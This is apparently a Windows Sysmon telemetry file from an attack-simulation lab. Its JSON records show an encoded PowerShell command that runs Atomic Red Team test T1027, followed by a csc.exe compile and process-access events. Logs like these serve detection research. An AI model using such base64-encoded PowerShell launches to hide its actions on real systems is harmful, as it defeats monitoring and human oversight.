{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nProcessId: 3064\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:43.953","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","ProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.cmdline","CreationUtcTime":"2020-08-01 05:52:43.953","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.963\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001080050A00}\r\nProcessId: 4748\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.963","ProcessGuid":"{A837DB8D-032B-5F25-0000-001080050A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001080050A00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+300(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+300(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474617bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001080050A00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+300(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+300(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474617bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001080050A00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001080050A00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
